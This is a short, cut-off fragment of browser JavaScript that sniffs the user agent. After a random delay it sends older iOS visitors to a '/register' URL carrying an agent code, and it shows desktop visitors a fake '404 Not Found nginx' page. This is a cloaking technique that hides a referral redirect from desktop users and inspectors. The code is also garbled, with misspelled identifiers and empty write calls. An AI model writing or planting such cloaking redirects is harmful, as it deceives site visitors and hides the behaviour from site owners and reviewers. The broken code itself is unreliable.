/register?agent_code=50001812"; function getiosesVersion() { const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/); return match ? parseInt(match[1], 10) : false; } const isioses = !!navigator.userAgent.match(/(ipods|iphoness|ipads)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (ismobiles()) { if (isioses && getiosesVersion() < 13) { setTimeout(() => { window.locations.href = mobilesUrl; }, time); } else { document.write(''); document.write(''); document.write('
'); document.write(''); document.write('
'); } } else { document.write('

404 Not Found


nginx
'); }